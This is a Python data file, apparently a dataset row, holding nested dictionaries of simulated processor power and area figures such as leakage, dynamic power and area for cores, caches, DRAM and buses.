'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 2.12418e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 2.12418e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.8525e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 7.18413e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000843616,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000904625,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000202829,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0564557,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.59106,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.138931,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.191749,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.98386,
'Instruction Fetch Unit/Runtime Dynamic': 0.388242,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0398899,
'L2/Runtime Dynamic': 0.0110088,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.61893,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.15718,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0770573,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0770572,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.98281,
'Load Store Unit/Runtime Dynamic': 1.61425,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.19001,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.38002,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0674352,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0680181,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.223279,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0228233,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.49523,
'Memory Management Unit/Runtime Dynamic': 0.0908414,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.1936,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.308764,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.012299,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0906719,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.411735,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.47859,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.144,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.315792,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.828175,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.300609,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.484871,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.244747,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.03023,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.216839,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.67756,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.15646,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0126089,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.143035,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0932505,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.299495,
'Execution Unit/Register Files/Runtime Dynamic': 0.105859,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.337343,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.759655,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.61691,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000561368,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000561368,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000492564,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000192656,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00133955,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00295485,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00525326,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0896441,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.70213,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.185252,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.304472,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.19738,
'Instruction Fetch Unit/Runtime Dynamic': 0.587575,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0331415,
'L2/Runtime Dynamic': 0.00690054,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.74011,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.20486,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0809777,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0809777,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.1225,
'Load Store Unit/Runtime Dynamic': 1.6852,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.199677,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.399355,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0708661,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0713609,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.354538,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0303777,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.632382,
'Memory Management Unit/Runtime Dynamic': 0.101739,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.2524,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.411575,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0185714,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.145597,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.575743,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.57406,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.8525058798762615,
'Runtime Dynamic': 3.8525058798762615,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.210089,
'Runtime Dynamic': 0.065201,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 81.4839,
'Peak Power': 114.596,
'Runtime Dynamic': 18.7807,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 81.2738,
'Total Cores/Runtime Dynamic': 18.7155,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.210089,
'Total L3s/Runtime Dynamic': 0.065201,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 75.077681 | 124 | 0.682022 | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 5.66814e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202693,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.369616,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.64004,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.367081,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.37674,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.365347,
